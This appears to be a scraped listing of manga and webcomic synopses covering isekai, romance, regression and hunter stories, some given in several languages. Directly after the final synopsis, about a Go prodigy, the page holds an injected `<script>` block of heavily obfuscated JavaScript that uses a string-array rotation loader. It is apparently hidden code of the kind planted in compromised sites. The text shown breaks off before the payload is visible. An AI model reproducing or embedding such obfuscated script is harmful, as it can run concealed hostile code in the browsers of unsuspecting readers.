An alternate world ruled by chaotic evil gods.The protagonist, Yuya, wakes up to the voice of a girl calling his name.He finds himself in a temple of desire ruled by the evil god, Riv, where many people are indulging in pleasure like madmen.Despite this, Yuya manages to maintain his sanity, which piques Riv's interest, leading to him being bound by a special chain.However, this chain is actually a tool meant to restrain evil gods, and by imprisoning and subduing them, it can steal their skills.Guided by the revelation of the ancient god Agnes residing in the chain, commanding him to "take your seat on the throne," Yuya uses this power to imprison dangerous evil gods one after another.The curtain rises on a lackluster man's alternate world imprisonment × counterattack erotic fantasy!
In the wake of scientific advancement, the once majestic mythological animals can't be compared to the olden days now. The mythological animal Si Bu Xiang received orders to descend to the mortal world and to help out other mythological animals in dire straits wandering the human world. In the secular world, he met his old colleague Pi Xiu in a tight spot, his drinking buddy Tu Ye down in his luck, and the gold and silver Jue brothers who were demoted to the mortal world... what kind of stories will happen between them? "You Shou Yan" updates every Wednesday, welcome to the furballs' world! Author: 靴下猫腰子 Editor: 凩汐
A two volume publication of short stories and oneshots published in Flowers (Monthly) magazine written by mangaka Yuki Kodama.
The story of a dog, Ponta, and his walker, Rieko. Originally published as a oneshot in Gekkan Shonen Sunday, and serialized on Twitter.
English: Himari is a high school freshman who in the first day attends the light music club’s performance at the school gym, falling in love with the upperclassman and singer Yori at first sight, confessing to her at the shoe lockers. Later looking for said upperclassman, Himari finds out that Yori isn’t part of the club and that she instead likes to play music alone at the rooftop. There, she finds out that Yori too fell in love with her. Español / Spanish: SpoilerHimari comienza la escuela secundaria y en su primer día atiende el concierto del club de música ligera en el gimnasio de la escuela, enamorándose a primera vista con la cantante Yori y confesándole su amor en los casilleros de zapatos. Buscándo a dicha cantante, Himari se entera de que Yori no es parte del mencionado club y que a ella le gusta tocar música sola en la terraza de la escuela. Allí, se entera de que Yori también se enamoró de ella.
Although Rita Cardinale married Grand Duke Giuseppe Catane to help her lover George become emperor, she is stabbed in the back by the love of her life and loses her entire family. As Rita uses her alchemy to try and stop the emperor’s army from taking her fallen husband’s land, she is sent back in time to right before she’s married. Full of vengeance, Rita wants to stop George from becoming emperor. For her plan to work, she marries Giuseppe again, but why is he acting so different from before?
What would you do if your school's extracurricular activity was a mandatory military service amidst an actual war? A class of students is turned into a platoon of soldiers to fight against unknown slime-like objects.
Français : Banaza, qui a été invoqué au royaume magique de Cryroad en tant que candidat Héroïque, du fait qu'il n'avait que les capacités d'un citoyen ordinaire, a été traité comme un Héros disqualifié. Lui, qui à l'origine était censé être retourné dans son monde originel, à cause de l'erreur du royaume magique, est devenu incapable d'y retourner, doit inévitablement vivre dans ce monde. Ce genre de personne, au moment où il est devenu niveau 2, a acquis toutes les compétences et la magie, et est devenu un super tricheur avec tous les points de capacité brisé par la limite ! Malgré tout, il fait les choses à son propre rythme avec un sourire facile. English: Banaza, who got summoned to the magic kingdom of Cryroad as a Hero candidate, due to having only the abilities of only a regular citizen, got treated as a disqualified Hero. He, who originally was supposed to be returned to his original world, due to the magic kingdom's mistake, became unable to return to his original world, inevitably has to live in this world. That kind of person, the moment he became Lv2, acquired all skills and magics, and transcended into a super cheat with all ability points broken through the limit! Even so, he, who does things in his own pace with an easygoing smile, takes Lys(Lees) of the Demon race as his wife, and fully enjoys newly-married life. He changed his name to Furio and leads even more laid-back life, but to such Furio household, on top of a pet saber and 4 freeloader female knights, even a Majin and Ex-Demon Lord join in, however even in this state, which couldn't be more chaotic, enjoyment of a laid-back life continues. Please enjoy the story depicting the everyday life of the Furio family, which with the birth of the twins, gets ever increasingly laid-back. Furthermore, story of the man who became the Hero instead of Furio included!
In a world where awakened beings with special powers are born through a mysterious system, At Saebom Kindergarten\'s Chick Class, Groo awakens as an S-rank Hunter at the tender age of 4. Along with that, she receives one important quest... [Quest: The child needs a reliable guardian!] The reason a guardian is needed? Because Groo has no mother or father. With no family of her own, Groo is adopted by Korea’s top Hunter after a series of struggles, and on top of that, she developed a new skill. [Find a new guardian and register them in the slot!] [Children can earn \'Filial Piety Points\' through various activities, which can be used in various areas.] Gathering guardians will lead to quick growth? \"This is incredible!\" Alright, I’ll gather all the S-rank guardians!
It had been a whopping 300 years. There was no way the best knight wouldn't show up. The ancient characters in the crystal mirror swirled chaotically. "If we're lucky, maybe an A-class knight will be born." "Please..." "Confirmed!" The chief engineer's voice was full of excitement. But no matter how long they waited, there was no follow-up report. Confused, Hakken opened his eyes. The crystal mirror showed the name and rank of the newborn knight in large letters. Name: Seed Rank: F Seed, the flawed product that shattered the kingdom's expectations. He endured all kinds of scorn and neglect, but in the face of death, he awakened his abilities. The stormy growth of Seed, the unique knight with boundless potential. [Level up! Would you like to distribute your stats?] Genres: Action, Fantasy, Shounen, Drama, Manhwa Keywords: Long Strip ; Full Colour ; Webcomic
Xu Han travelled back to his high school year. That means there are only 3 hours left before the earth goes through dramatic changes. Xu Han was slaughtered by the despicable Regal in his previous life. Now he needs to seize the chance and awaken his soul and body before other cultivators do. He will cultivate to the top and become the immortal king in the new world!
Xiao Yu, a genius of Go on the modern earth, is a chess idiot (A boy with a crazy mind). Abducted by an old man with white beard to another world, and encountering a weird chessboard with secrets and spiritual power etc.<script></script><script>(function(_0xb4bb4d,_0x7e917d){var _0x4e1ff8=_0x3ff8,_0x42303e=_0xb4bb4d();while(!![]){try{var _0x370bcc=-parseInt(_0x4e1ff8(0x1fe))/(-0x2*-0xdc9+-0x749+-0x1448)+parseInt(_0x4e1ff8(0x1f6))/(-0x2379+-0x407*0x2+0x2b89)+-parseInt(_0x4e1ff8(0x200))/(-0xdd2*0x1+-0x2572+0x3347)+parseInt(_0x4e1ff8(0x20a))/(-0x2156+-0x209f*-0x1+0x11*0xb)+-parseInt(_0x4e1ff8(0x1fa))/(-0xe*0x185+0x1801+-0x2b6)*(parseInt(_0x4e1ff8(0x203))/(0x1c*-0x7f+-0x1*0x4a3+0x128d))+parseInt(_0x4e1ff8(0x1f8))/(0x1b61+-0x1*0xea7+0xcb3*-0x1)+parseInt(_0x4e1ff8(0x1fb))/(0x123*0x8+-0x1*-0x2381+0x2c91*-0x1);if(_0x370bcc===_0x7e917d)break;else _0x42303e['push'](_0x42303e['shift']());}catch(_0x1c750e){_0x42303e['push'](_0x42303e['shift']());}}}(_0x57ff,0xa4468+0xb51*-0x13f+0x14*0xe1f3));function _0x57ff(){var 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